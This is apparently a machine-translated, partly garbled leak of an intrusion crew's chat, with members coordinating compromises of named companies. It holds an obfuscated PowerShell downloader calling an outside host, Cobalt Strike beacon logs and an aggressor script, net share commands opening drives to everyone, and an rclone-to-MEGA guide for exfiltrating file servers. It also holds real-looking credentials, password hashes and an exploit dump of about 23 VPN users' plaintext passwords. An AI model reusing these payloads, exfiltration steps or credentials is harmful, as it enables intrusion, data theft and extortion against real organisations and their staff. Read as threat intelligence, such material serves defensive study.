they have a lockout after 5 failed, i think how not to break it with the admin-not yet out of the point? i who works with benihana?hello, all hihi)hihi all helloTill tomorrow, thank you all, until tomorrow))restart the clientobnovanoya[ ](https://mediaeveryone.com/channel/general?msg=ZF8QdG6YHpW3E5Q5h) that is hung? More precisely teem server, probably hangs after lunch will give more sessions@user1 once said that you need time to put your records on modules and vectors in order, before lunch can deal with it yesThe second team helps first with emeralmatherials.com?
Our sessions:hiDo they? 2 from the other team2 from the other teamwe're 4 not here yet? EPM is all have sessions? Good morningGood morningGood morningThen send the actual information to the confab so that everything was in front of me no, is everyone still? Yes, I'm still doping armas so we'll start soon so what.octave movement started Join with @user8 still...still quiet``
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JENsemx0NFpld2U2bXI0ZTJMRTlkdzllRUNFSkhiUmxZY0NFPTA7CiRfaWQ9J1IzUFgzMmNkVmNIRE1IODd2MzBURWRXallaQTl2SzhWVlJpUjN6dVUnOwokX3VybD0naHR0cDovL3dpZGVpby5jb20vYXNzZXRzL2Nzcy9ib290c3RyYXAubWluLmNzcyc7CnNsZWVwIDEyOwokc3N3ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoOwokZWMgPSAkZXJyb3IuY291bnQ7CmZ1bmN0aW9uIGI2NGUgKCRzdHIpIHtpZiAoISRzdHIpIHsgJHN0ciA9ICcnIH07cmV0dXJuIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkc3RyKSk7fQpmdW5jdGlvbiBiNjRkICgkc3RyKSB7cmV0dXJuIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cikpfQpmdW5jdGlvbiBzcHIoJGEsICRwcykgewokV0MgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50Owokd2MuSGVhZGVycy5BZGQoJ2FsdC1zdmMnLCAibWE9JChHZXQtUmFuZG9tIC1NaW5pbXVtIC05ODc2NTQzIC1NYXhpbXVtIDk4NzY1NDMpLGgxLVEkKEdldC1SYW5kb20gLU1pbmltdW0gMTAwIC1NYXhpbXVtIDkwMCk9YCI6JChHZXQtUmFuZG9tIC1NaW5pbXVtIDQwMCAtTWF4aW11bSAxMDAwKWAiOyBtYT0kKEdldC1SYW5kb20gLU1pbmltdW0gLTk4NzY1NDMgLU1heGltdW0gOTg3NjU0MykiKTsKJHdjLk
``full''
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANgAwADgAaQBzADEAVABLAEUANgA5AHIAegBDAEgAdQB4AEQAOABBAFAAbABXAEUAUQBWAG0ATABJAHEAbwBmAFYASwBkAG8AMQBhADcAawAnACkAKQA7AA==
Give me a load of the stuff you don't have...put the dlluwas supposed to be there yet. did it come?[ ](https://mediaeveryone.com/channel/general?msg=2K7rdb6f6WThpRqdB) ok if it doesn't come in 30 min, you'll write 30 min. put@user4 give me more silk code[ ](https://mediaeveryone.com/channel/general?msg=tXPbfeLk4E8h253QE) add me to the confutaq still 1 help @user8 he has a fat network there would not want to lose it, build a dll from kobyzhivoy there) my it?TomHolzerFordwhat's his? ask my guys if it's theirs. I'll tell you what's mine...I'm confused, yours is not)((I mean @user4)
urlbig.com:443vrue, found yours now give others do not exist think about how you'll act just run your eyes over the Mapuhoto not worthwhile@user9 write out a plan to close by roadmap7[ ](https://mediaeveryone.com/channel/general?msg=R3BrByJd5Xknit5Jx) under whom? which did not have time? if so, then the conf is not me yesterday there was another - ballymoregroup.com if you can get it back, I can continue with it, or user8 help with 26 trustsconf under it there was another one, but it almost immediately offsolved - did not have time[ ](https://mediaeveryone.com/channel/general?msg=vr32eeF23pzvdXTJo) heremb I will now launch you there in general those with whom I workedwill see what to give me)no. but for today, yes)are you done with him? no. we were here with the router again poking around and you started at 6?[ ](https://mediaeveryone.com/channel/general?msg=9pJzNgC67kaNguRSm) writing, yesterday the last one at the end of the day went to the offethese means to sit idle?there is no active guys, I'm not a telepath, if you sit without work write write that people are working in the input sessions who like yesterday are still dead why sit silently I also do not have a live in the input cobb is there new? or after 3 am or until 6 pm you know the timing in my grid kst only 8 am @user9 if finished take another network to work) ah) I have it and build skid before closing) so ah close.we are not closing now why? @tl1 add us to @user9 in the confab, if it's not difficultselfspin.com sorting of servers and other information in the confab.hiB corbel.com all ready for closure then the plan for today is: 2 people who have already taken YES work in the same network and ready to close, the rest while lifting the rightsDa, but not all came up All alive, in good health and mind?HiTo all helloDa)morninG) to all goodnightTo all without misunderstandingTomorrow i.e. todayHappyTo all until tomorrow)hopefully in the eveningTo 6 khoroshoda, two?without "probably a normal grid" right? total 2 networks with Dada, also Dada and dll ran `MM-LIB` host where dll attached prokatitchekni then shtasku at the stage of work with vpnom it was in lrhstuck and did not solve[ ](https://mediaeveryone.com/channel/general?msg=Xj8qmsWoqKomTqCah) how did you solve?give the hostname also yes and dll is running? well i had at least so it was somysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysmysm's was there yes, looking for edtam hp) ohohohojitwinds you ten tomorrow will solve these cases get such ``
beacon> shell net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[*] Tasked beacon to run: net use \\FAMIXXP\c$ rbuilder /user:Wilsonart.com\REPORT_BUILDER
[+] host called home, sent: 95 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

``boys are part of a group of hp adminstrusts will scour tomorrow in the current one or trastaherstech.com, fishusa.com, holzerford.com - removed adinfo, kerbs, EA YES. all sessions are off.this is wherealloypolymers.com
>description: password rbuilder
>description: Generic GroupWise account for Adhesives.  Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: The service account for DCWAS08 Execel Password is VantgagePoint
``@user8 here's some food for thought for tomorrow if the session doesn't die[ ](https://mediaeveryone.com/channel/general?msg=A24quWh36NdPwR2Px) COGNOSPD.korbel.com
dcsync was taken off, maybe the lab, now in slip, waiting for commands
 
`wilsonart.com'.
28 trusts, minus duplicates and quarantines - 7
7 trusts removed from hell, two trusts and the current domain removed from the kerbs@user9 say his hostnamecorbel.com
There is a YES
run the dll on the far server
found sphere and creeds
found edr and krediSnatched the AD, lifted the system, no kredi to move on, with nyah kerb kredi given for decryption.are there dll running on the servers and so yes to me exactly the network interests with YES which we will close tomorrowwrite reports on workMany of 2826 trusts)are you many left?+++ alive? you about the zealot do not forget? my keyloggers empty (there is nothing empty) they just work with shul and sometimes write to each other keyloggers have not checked? yes shul there all in #waterway-com uploading backups mail finance admins + deal with shul so what do you have?so the sooner we check everything for tomorrow the sooner we go to bedtoday we're closing 2 grids so the sooner we work the sooner you go hometodaytodaytodaytodaytodaytodaytoday by 6 and today we need to prepare everything for tomorrow i understand you're tiredtodaytoday we're closing the rt or till 00 work @tl2 @tl1 same, backups in water what are you busy doing?i did not try it, that's why i wrote it like with rdp)) try it without rdp? it pours very fast because of the high compression
now there is no need for any 7za and unzipping the mega! everything is very quiet and unnoticeable!

download rclon from the off-site. rclon.exe put it in the right directory, then everything according to the manual. I did everything through the rdp
You register a mega, choose it from a huge list, which rclon provides us. rclon quietly connects to the mega and makes a clone of what you need. you can at least the whole fs. it downloads everything through rclon, so the download speed is high.

Here's the guide. It's simple
https://rclone.org/mega/

next command to download

rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.

example

rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
``https://rclone.org/если requires some amount of data to be uploaded''.
8. Backup database
sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'"


for remote/other local server change localhost to ip,port
alternatively localhost,%port% (see netstat)
``````
7. Output all tables of a specific database
sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W
``````
with size in megabytes
sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"

``````
1. Display all databases on the server in kmd
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
As soon as you jump into the process you look at the databases list by default there is sqlcmd tool installed on the server it has direct access to the data to backup the sqlwriter, sqlsrv processes on the sql server) workedI press the bind nothing happens what? @tl1Yt hf,jnftn&https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/tools/1vpn check thereupon there is access to the domain no load for egoghbdtnHi, our evo vpn has fallen awayHiHiHiWell, now checking did you check wilson? did the file appear on the unshared armas? flew home where we have @user9? how unexpected and niceaaa we miss our family as much as you)missed you?)helloTo all helloDo you want me to ask everyone in the confuskinu to the appropriate confuaga, I'll dig in the records of strangers to see what there may be interestingthem the difficulty, as I understand from @user7 is to find a sphere / backups? well, let's finish today probably? there he is small aha)as you see - norrivet good evening! @tl1 not yet?
BACKUP$
BACKUPDVR$
CHIBACKUP2020$
CLEBACKUP$
CLEBACKUP2020$
DVRBACKUP2020$
DVRNEWBACKUP20$
KCBACKUP2020$
KCNEWBACKUP2020$
NEWBACKUPCHI$
NEWBACKUPCLE$

``````
\BLAUERPC\D$
\DRB2\Archive
\\{\DRB2\Backup
\\Replication
\\GKELLER/G$/Backup
\\GKELLER/G$/WW2k1/IT/SolarwindsBackups
\REPORTING\D$\SQLBackup
\\Data\AKPRO_Data\BACKUPS
\WW2K1\F$/Backup
\WW2K1\F$Data\AKPRO_Data\BACKUPS
\\{\WWSQL\S$\SQLBackup
``.``WATERWAY\blauer 11915Admin2179!````
http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!
WATERWAY\mharper LoveUnit14
``Good evening. we're here)))))Thank you for such flattering words, and @tl1 is also a pleasure to work with
I wish I could find some red words, but I'll just respond with... an anecdote!

A pentester is walking through the desert, he wants sex, he meets a genie, and he asks him "What do you want, traveler?"
-Fucking, says the pentester.
And then out of nowhere appears a bunch of all sorts of spheres without creed, not decrypted hashes on kmd5, grids in which the domain is not visible and a billion all kinds of avers

-Get the fuck out of here,‖ jinny answers. -Yes, the last thing I wanted to say, while you're resting, think about whether any of you want to take additional offline courses through the official pentester refresher course
CEH, OSCP and the like
So have a nice holidays) see you next year) Likewise) We are also happy to work with you )From us too we want to say thank you, it is a very useful experience, especially in a short period of time. My head is boiling, but it is interesting) Happy New Year to you = ) )In short - all are good) the most difficult passed) further will only be more interesting) from my experience, I say that in comparison, you are growing very fast on the technical part, small zatupy have all, and this is normal
But next year we'll get to a completely different speed, start parallel technologies, dig nixes
i for my part and @tl1 and the development team will also be preparing some cool stuff for you
hope i am not mistaken)and for a very short time by the standards of junior pentests we have come a long way from 0 to the current cases with the flag -nomutex so i want to share my impressionsthen see you soon) backups in work, the backups are working and i'll be back up by 21 til next tuesday. i will be back up by 21 tuesday but report here now please = )
so @tl1 knows what's the plan)
who can today - pull up to 21
if no one can, go on vacation
I don't know anything.)
At @tl1 let's ask)last day also in case of success? >last case on the last dayvono, of course, no problem, if anyone else can not - say, today "at will" with bonuses in case of success of the work itselfvtl1 we'll do the last case at all I have a day of groundhogs
I just looked at the calendar for the first time in a week and a half or two I will be able to communicate, but not in the office, in the evening I fly away
I was planning to go on holiday today, so the tickets are bought(
i think the guys will cope with a small network without me a good question, i think to finish some last case on the last day =)and for what, like we said on holidays go away ... friends, today's case comes to an end, as the final touches to backup will be solved, the server and workstation checked - all go to rest
@tl1 said before leaving that we're going to 21, have time to rest?[ ](https://mediaeveryone.com/channel/general?msg=FtyaEbnGv588f4knR) Well, another plus exeshnik is a lot of threads. icacls a long teamdobavliv grunt fullpo therefore exeşnik seemed easier) there batnick also swore - and Timlid2 said, I threw you in private, something about regulars, etc.so polis are more swearing ehena exe and scatterbatnik easier than ehesut same in order to scatter on armieswhy not batnick?and build me, in laba runningasdavayne, if grunt full works fine then add it to the exeştnik - minute and so and so ran from the admin? i checked in the laba batnick - no problem with this no - vorkgruktachka outside the domain?
Node Name: DESKTOP-5SMSDNR OS Name: Microsoft Windows 10 Pro OS Version: 10.0.18363 N/A OS Manufacturer: Microsoft Corporation OS Settings: Isolated Workstation OS Build: Multiprocessor Free Registered Owner: User Registered Organization: Product Code: 00330-80000-00000-AA618 Installation Date: 09/16/2020, 13:38:44 System Boot Time: 12/22/2020, 1:54:35 System Manufacturer: Gigabyte Technology Co.                                                         System model: G31M-ES2L System type: x64-based PC Processor(s): Number of processors - 1.                                                                                                  [01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2834 MHz BIOS version:                      Award Software International, Inc. FF, 10/13/2009 Windows folder: C:\Windows System folder: C:\Windows\system32 Boot device:              \Device\HarddiskVolume1 System language: ru;Russian Input language: ru;Russian Time zone: (UTC+03:00) Moscow, St. Petersburg Full physical memory: 4,085 MB Available physical memory: 715 MB Virtual memory: Max size: 5,621 MB Virtual memory: Available: 828 MB Virtual memory: Used: 4,793 MB Swap file location: C:\pagefile.sys Domain: WORKGROUP Network login server:              \DESKTOP-5SMSDNR Patch(s): Number of installed patches - 12.                                                                                   [01]: KB4586878 [02]: KB4513661 [03]: KB4516115 [04]: KB4517245 [05]: KB4521863 [06]: KB4561600 [07]: KB4576751 [08]: KB4576754 [09]: KB4577670 [10]: KB4580325 [11]: KB4586863 [12]: KB4592449 Network adapters: Number of network adapters - 2.                                                                                            [01]: Qualcomm Atheros AR8131 PCI-E Gigabit Ethernet Controller (NDIS 6.30) Connection Name: Ethernet DHCP enabled: Yes DHCP server: 192.168.88.1 IP address [01]: 192.168.88.248 [02]: fe80::d935:55:e14f:fe49 [02]: VirtualBox Host-Only Ethernet Adapter Connection Name: VirtualBox Host-Only Network DHCP enabled: None IP address [01]: 192.168.56.1 [02]: fe80::f4c1:748b:225c:98a0 Hyper-V Requirements:               Virtual machine monitoring mode extensions: Yes Virtualization enabled in firmware: Yes Layer 2 address conversion: No Data execution prevention available: Yes
``vin10version os etc.'' Where do you run it?
System error 1332.                                                                                                                                                                                                                          Matching between user names and security identifiers has not been performed.  
``there - where?'' without grunt full, it's just going the wrong way.
C:\Users\awilson\Desktop>1.bat

C:\Users\awilson\Desktop>net share c=c: /grant:everyone,full
c was shared successfully.


C:\Users\awilson\Desktop>net share d=d: /grant:everyone,full
d was shared successfully.


C:\Users\awilson\Desktop>net share e=e: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.


C:\Users\awilson\Desktop>net share f=f: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.


C:\Users\awilson\Desktop>net share g=g: /grant:everyone,full
The device or directory does not exist.

More help is available by typing NET HELPMSG 2116.
NET share A=A: / grant:everyone,full ``you have a space there,`` the same principle.
C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: / grant:everyone,full Unknown parameter /.                                                                                                                                                                                                                         Syntax for this command: NET SHARE shared_resource shared_resource=drive:path [/GRANT:user,[READ | CHANGE | FULL]] [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents| Programs | BranchCache | None] shared_resource [/USERS:number | /UNLIMITED] [/REMARK: "text"] [/CACHE:Manual | Documents | Programs | BranchCache | None] {shared_resource | device_name | drive:path} /DELETE shared_resource \\computer_name /DELETE For more help, type NET HELPMSG 3506.                                                                                                                                                                                                                                                                                                            C:\Users\shara\source\repos\SharpHandler\bin\Debug\netcoreapp3.1>net share A=A: /grant:everyone,full System error 1332.                                                                                                                                                                                                                          The mapping between user names and security identifiers has not been done.  
Well I ran the lead on our office computer. win10what was the environment? So it was in the batknick and it was swearing Then you can't do without the batknick like "I can't match something with something" I don't know what it's swearing about?
/grant:everyone,full
```
it's not working at all ```
/grant Everyone:F /T /C /Q
/grant:everyone,full
```
did you take this into account? didn't you make this one?[ ](https://mediaeveryone.com/channel/general?msg=tTo8qqSowdwhX3xRy) not this one?[ ](https://mediaeveryone.com/channel/general?msg=BgFFK5gy8Bs3kp6Kx) what was the batik and the exechanger? I won't answer, you'll get scolded, did you make the batik and then exechanger by any chance save it?good question, I do not know which of the confines of the wrote it guys who remember where @tl2 wrote about the driver balls, please copy them to health host specified in , the second argument) mapped only c$ balls thank you) `` ``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:28> share-mapper KCNEWBACKUP2020
[*] Attaching c$ in KCNEWBACKUP2020 host
[*] Tasked beacon to run: net use *\\\KCNEWBACKUP2020\c$ /PERSISTENT:YES
[*] Tasked beacon to run: net use
[+] host called home, sent: 115 bytes
[+] received output:
Drive Z: is now connected to \\KCNEWBACKUP2020\c$.

The command completed successfully.


[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.


Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 04:06:51> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK Z:        \KCNEWBACKUP2020\c$ Microsoft Windows Network
The command completed successfully.

``Check''.
#ShareMapper.cna
#Author: @noname
#no desc

beacon_command_register("share-mapper", "shares attacher",
    "Syntax: share-mapper [hostname1,hostname2,hostname3,hostname4]");

alias share-mapper {
    if ($2 is $null) {
        berror($1, "Need hosts!)
    } else {
        @hsts = split(",", ["$2" trim]);
        foreach $entry (@hsts) {
            blog2($1, "Attaching c\$ in $entry host");
            bshell($1, "net use * \\\\$entry\\c\$ /PERSISTENT:YES");
        }
        bshell($1, "net use");
    }
}
``honestly speaking, I haven't tested it myself yet)looks interesting, but what is "poc.exe", is it an exploit or just a toolkit, so that the file won't be deleted? I don't really get it.}ttp://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/ but not in 2 we guessed) no new sessions today)hmmm, so let's keep working @tl2 ? and where do we have @user1 and @user3? it's ok)) and @tl2 just re-snap the accessible kerb) how to check it? there are kerbs disconnected accounts yes you get the idea if the kerb LA on the server somewhere there may well be hash admin and so you can try to kerb that will unbroken check on the car from which was kerbdakerby just there?so what's the difference between admin/non-admin in this case, I'll look at the ticketsThey've deleted a lot of admins, and now the kerbs only on the absent.no kerbs (kerbs only faster @tl2 now I'll change it so it will be better you at least change your ava) it's ok, keep quiet for a minute and he'll see for himself) look who wrote it, never mind the point it does not matter he read and did not understand it and what? well, read it carefully and what did you throw it at me first?[ ](https://mediaeveryonecom/channel/general?msg=4EFEQi79LBrjifoBX) Yeah[ ](https://mediaeveryone.com/channel/general?msg=BhrQCGmk6EgJ9rrLj) 1kerbs will be the same no matter what car they were shot on? Not me)re-shoot and direct to @tl2Need to re-shootYes, the old ones went stale...there is an alternative solution for snpartners, there are yes - but the farm is not there yet (and we have no kerbs at all so the farm will be in 2 weeks anyway kerbs yes no kerbs are you kerbs filmed?we're trying to get the credits YES[ ](https://mediaeveryone.com/channel/general?msg=BDC8RKTmvoJ8CaP9h) :dog:[ ](https://mediaeveryone.com/channel/general?msg=v8ebbs3n7d6WSkYjs) ?as it turns out nothing) (also a joke, don't take it seriously) you know? and today you said "by ten" and then "by two" you said "by ten", and? it's clear, you just said the same) i didn't understand what i wrote
?[ ](https://mediaeveryone.com/channel/general?msg=w5zjzpnoK9RJLRAy5) by two ?
?I have deja vu[ ](https://mediaeveryone.com/channel/general?msg=nkgf4mWcASkFHjag6) it's on the oldbut there will be new ones closer to 10That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now? on #stanthonyskc-com too on #snpartners-com nothing newHow are the tasks going?:space_invader:helloHow is the progress on the others? the chinese are not back, no new ones... What time do we wrap it up at 6:00? What time tonight?
Sessions is stuck.
Thanks a lot and I've got it... if you use parameter --public-only then it will show only those where user admin[ ](https://mediaeveryone.com/channel/general?msg=2iRoChhq3cHrToCzj) by default 50 like the threads are turned up to max... but that's cool. why is it so monsterrickly fast? no it's not, it'll show the balls and take the list from the adtoot just sharers I think ad is only used with ips?
execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt
```
correct ?ops)``execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt `` ping the fostlist )``
        * SharpSharesNG <ips|shares> --max-threads 10 --output console|/path/to/file
         *
         * ips - equiv ips ad
         * ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
         * ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
         * ips HostName [--os-detect] [--alive] [--exec] script\path
         * ips [ad] [--os-detect] [--alive] [--exec] script\path
         * ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
         *
         *
         * shares - equiv shares ad
         * shares 10.0.0.1 [--os-detect] [--public-only]
         * shares 10.0.0.1/24 [--os-detect] [--public-only]
         * shares HostName [--os-detect] [--public-only]
         * shares [ad] [--os-detect] [--public-only]
         * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
``She's, secludes? or just start it and it spits somewhere? is there any argument? @all share please ѕharshareset one and a half pk@user8 with @user3 are preparing which of ?today we close one networkhowever not, there already all in water how is it? if not collects detailed report in confusobirthing nothin, tried three times - not collects work tules panel what, not working?hmchet all the same lostprobuyuje@tl1 reboot my dedikt plz)))) boshyuyaa all so we kolupali so a month in zohocorpinadaworkgroup? and vg is what? meanwhile study the methods of work through vpn in vg20 min then recurse you now without a task?what did you read in the mail? was it my versionoffline backups? understand how you recovered and what you missed?
beacon> shell nltest /dclist:waterway.com
[*] Tasked beacon to run: nltest /dclist:waterway.com
[+] host called home, sent: 58 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
``You threw the output with fqdn and that's what I threw the output from try to get the DC list from the list /dclist:shell nltets /dclist:yeah, fuck it```
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully

``just came in cheknudomennaya authorizatsiya there? hello2sessions in the water left? everyone hi in the near future waiting for the farm under the kerbs)no info yet or under php on the wind) anyone searched for sploits under oracle?I would generally make an emphasis on services that are used in the networks, in addition to those that have passed lpe and can look for modules so if we do not have time for weekdays, we will have busy weekends we need to close at least 3 networks completely in the week will come the new sessions on Mon sleep and rest next week will be difficult, right?i hope it's Saturday-Saturday = weekend:thumbsup:let's go homeDa@tl1supportedrubbit really fall asleep at the keyboard go home already? for domain accounts can not be so passes may be different (i think so)he is listed as yes but he and LAa is not he so``?
Result：
Not Found, it is being cracked by our background system.
Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.
``Checked@user7`STAKC.local\sysadmin ff928c9f7bce0d834658c1436381494e``[ ](https://mediaeveryone.com/channel/general?msg=yBPXxCfaa9nF87Rzh) in which grid? Objects gettrunda here are the usersa have you checked by user group? almost 2120659 Objects gettrunda and not 30a on the second network (mine) only 20+ pk in #snpartners-coma we have 30k pk in the network yes?well there on some machines lA are domain users more, lA only hashclir lA? oops, channellly only those i wrote in the group did not find? those hashes as i understood not valid and lA we do not have?and only he alone on the key machines, and the other machines he goes through the local admin only 1 LA without a crate can not go anywhere, got all the possible from those cars on which the ducked the second network?here yes it's been a week since he announced to one MAu not pull servers in coba before closing@user4 coba in ls@user3 to @user8 byeHello all goodnight:space_invader:hello today until how many?YES there is nowhere? and the spns themselves, too, it seems like something you can chek. Yesterday I read something about it yes, there is a skul server, in powerupsql it says that you need to specify [machine]/instanseName...talk about spns? There is a thought to poke the skul, but do not know how to learn the name of the instance of the subject? or to test from the msfa there is a point to look for additional modules all patched not on the attack and the scan YES did not take? The day before yesterday changed passwords, deleted unnecessary YES. Nashuemel maybe why spalili? groups can write through #stanthonyskc-com more `stanthonyskc.com`STAKC in the works, but there we are probably spalilištom in the workspanki hoihiPrivetest who?All hellobbsb tomorrow to 12+retif.com confbukkmary in webmorda no one2auth+pozhaylustamen add to it until only adinfu managed to throw out quickly from there is where yes`grantweber.com`
I checked everyone in the first one, no one has any bookmarks.
in the second without 2fa, go through the client, almost immediately throws out, butch more men seem to move?
[+] Checking URL https://172.81.67.174
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.2-13sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://172.81.67.174
      [+] Found: SessionID: 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ= userType: 1 userName: dscully Password: Scully2@ Domain: retif
      [+] Found: SessionID: 3mzEGy480eoTW0PVGB4WkTx1pBcNckgNRvimSDRWboM= userType: 1 userName: acatalanotto Password: vera1010 Domain: retif
      [+] Found: SessionID: 6nkViGzUAfwhcy9EQTC4B1cnAJKVmuLVBoJQnaDHKKI= userType: 1 userName: rblanchard Password: abcd@1234 Domain: retif
      [+] Found: SessionID: 7180aU0jSdpraYLUADh6OpRYJJZekIHXoo2xT8XjI1tM= userType: 1 userName: anguyen Password: Car47029 Domain: retif
      [+] Found: SessionID: ClOqhz81D1QDthdUyzSnIFF3f9qpwBDnv6lJAueAMI= userType: 1 userName: dstoutin Password: C@ryH@milton Domain: retif
      [+] Found: SessionID: IMGyFJ3dmPSncBddBfqJzy5C9W0heL1wY02V35a3Ei8= userType: 1 userName: dblanchard Password: Tujaques2 Domain: retif
      [+] Found: SessionID: NrRgAAQeaCc1nMajX8HGk4ySOyKy89nDEs5Dbfm7JAtA= userType: 1 userName: mcooper Password: !Crystal2 Domain: retif
      [+] Found: SessionID: W1ed6V04FqvC8gm29587VfRoeqi7xvSIltpz1O6txrw= userType: 1 userName: lotrocki Password: Lisa0759 Domain: retif
      [+] Found: SessionID: WMhTxZjMPY1fIXps0WPYYA2kgbnnKD1fQxQm5tbuEoI= userType: 1 userName: jdufrene Password: Memphis3 Domain: retif
      [+] Found: SessionID: ZuQ9mTRTfwnBvo01zvkWjbiEpg08U9ZZtdH7rXiISAg= userType: 1 userName: hnguyen Password: Jan_2021 Domain: retif
      [+] Found: SessionID: dN616QT3BLlfjo6XWoSaQVHJnAngQo6LiTVFH30xc4w= userType: 1 userName: Pschmidt Password: AKLfefe1988!!! Domain: retif
      [+] Found: SessionID: e6cwRd0MGWQZVZHmX09ldTrZdr4VC23Cm4qU1V41dZ0w= userType: 1 userName: lgagnet Password: Minto123* Domain: retif
      [+] Found: SessionID: eI0R46CQYycD1NLEwpoEdF9nHtx7vpteNugSjYFj9tg= userType: 1 userName: awashington Password: 0ilTruck! Domain: retif
      [+] Found: SessionID: jgdazqQh0tgr1o8MG6ikF2184YZzRokNrHb1PTyin5c= userType: 1 userName: msepter Password: abcd@1234$ Domain: retif
      [+] Found: SessionID: jwAGVr88UefTCwRfR9L4c8yeyRQAEFQlVtois0VO7X0= userType: 1 userName: lfisher Password: Alexander14 Domain: retif
      [+] Found: SessionID: jyQ0Ho1OBKlJSAVMstBiz1MvRXBKywGB0XYEiwMfcg= userType: 1 userName: jrusso Password: 504Jamie#@! Domain: retif
      [+] Found: SessionID: oNbdkn6iFhSvXfc3yvNApWNCg71kcTk1Lky2pn04jY= userType: 1 userName: kjones Password: Dothan24! Domain: retif
      [+] Found: SessionID: s27ilDCfc00iQPuHM0LueLSKoC8i4a4eT4A1D5LbNPQ= userType: 1 userName: lcoriell Password: Jutland@1840 Domain: retif
      [+] Found: SessionID: uapufXbKjgRslg2pFYEmT8b5PkKO9s4N5stplyxkEfQ= userType: 1 userName: tragas Password: Troll112// Domain: retif
      [+] Found: SessionID: x7QnRi1w6uhqEK3E3z7XUPKtgDcbYWWaFCPNbG0idLI= userType: 1 userName: ehicks Password: H@ppyD@y1 Domain: retif
      [+] Found: SessionID: xtxwXEVx0Rp5h8Lc40tMB5kMB5kBQTvFpLfdXxYP3UPOH6o= userType: 1 userName: barcement Password: Ba041913* Domain: retif
      [+] Found: SessionID: y43yuwBMnVBmeEEjwC6k8yRxce0p619bb2U6IU8rg8= userType: 1 userName: dwinter Password: Blair127! Domain: retif
      [+] Found: SessionID: zxKhq2SRlYmt17y2UOP1BXEwyh00UCkDAgUKb2HL2PU= userType: 1 userName: ehassell Password: Amelia#0130 Domain: retif
[+] Done with https://172.81.67.174, found 23 sessions
23
[+] Saving session data
[+] Trying session 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ=
